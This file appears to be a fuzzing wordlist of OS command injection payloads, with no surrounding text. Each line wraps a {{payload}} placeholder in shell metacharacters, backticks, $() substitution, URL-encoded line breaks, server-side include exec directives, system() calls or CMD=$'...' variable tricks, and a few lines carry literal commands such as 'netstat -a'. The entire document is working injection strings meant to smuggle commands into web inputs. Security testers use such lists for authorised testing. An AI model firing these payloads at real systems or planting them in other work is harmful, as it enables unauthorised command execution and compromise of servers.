'$({{payload}})#
' $({{payload}}) %23
<!--#exec cmd="/usr/bin/{{payload}}"-->
<!--#exec cmd="{{payload}}"-->
/index.html|{{payload}}|
;{{payload}};
;{{payload}}
;netstat -a;
;{{payload}};
|{{payload}}
|/usr/bin/{{payload}}
|{{payload}}|
|/usr/bin/{{payload}}|
||/usr/bin/{{payload}}|
|{{payload}};
||/usr/bin/{{payload}};
;{{payload}}|
;|/usr/bin/{{payload}}|
/usr/bin/{{payload}}
{{payload}}
/usr/bin/{{payload}};
{{payload}};
/usr/bin/{{payload}}|
{{payload}}|
;/usr/bin/{{payload}}
;{{payload}}
|usr/bin/{{payload}}
|n{{payload}}
`{{payload}}`
`/usr/bin/{{payload}}`
a);{{payload}}
a;{{payload}}
a);{{payload}};
a;{{payload}};
a);{{payload}}|
a;{{payload}}|
a)|{{payload}}
a|{{payload}}
a)|{{payload}};
a|{{payload}}
a);/usr/bin/{{payload}}
a;/usr/bin/{{payload}}
a);/usr/bin/{{payload}};
a;/usr/bin/{{payload}};
a);/usr/bin/{{payload}}|
a;/usr/bin/{{payload}}|
a)|/usr/bin/{{payload}}
a|/usr/bin/{{payload}}
a)|/usr/bin/{{payload}};
a|/usr/bin/{{payload}}
;system('{{payload}}')
;system('{{payload}}')
;system('/usr/bin/{{payload}}')
/usr/bin/{{payload}}
{{payload}}
/usr/bin/{{payload}}
{{payload}}
`ping 127.0.0.1`
| {{payload}}
& {{payload}}
; {{payload}}
 {{payload}}
`{{payload}}`
$;/usr/bin/{{payload}}
$({{payload}})
{{payload}}
;{{payload}}
;{{payload}};
^{{payload}}
|{{payload}}
<{{payload}}
<{{payload}};
<{{payload}}
<{{payload}}%0D
<{{payload}}
&{{payload}}
&{{payload}}&
&&{{payload}}
&&{{payload}}&&
%0D{{payload}}
%0D{{payload}}%0D
{{payload}}
{{payload}}
{{payload}}
{{payload}}
'{{payload}}'
`{{payload}}`
;{{payload}}|
;{{payload}}/n
|{{payload}};
a);{{payload}}
a;{{payload}}
a);{{payload}}
a;{{payload}};
a);{{payload}}|
FAIL||{{payload}}
CMD=$'{{payload}}';$CMD
;CMD=$'{{payload}}';$CMD
^CMD=$'{{payload}}';$CMD
|CMD=$'{{payload}}';$CMD
&CMD=$'{{payload}}';$CMD
&&CMD=$'{{payload}}';$CMD
%0DCMD=$'{{payload}}';$CMD
FAIL||CMD=$'{{payload}}';$CMD
CMD=$\'{{payload}}\';$CMD
;CMD=$\'{{payload}}\';$CMD
^CMD=$\'{{payload}}\';$CMD
|CMD=$\'{{payload}}\';$CMD
&CMD=$\'{{payload}}\';$CMD
&&CMD=$\'{{payload}}\';$CMD
%0DCMD=$\'{{payload}}\';$CMD
FAIL||CMD=$\'{{payload}}\';$CMD
CMD=$"{{payload}}";$CMD
;CMD=$"{{payload}}";$CMD
^CMD=$"{{payload}}";$CMD
|CMD=$"{{payload}}";$CMD
&CMD=$"{{payload}}";$CMD
&&CMD=$"{{payload}}";$CMD
%0DCMD=$"{{payload}}";$CMD
FAIL||CMD=$"{{payload}}";$CMD
<!--#exec cmd="{{payload}}"-->
;system('{{payload}}')
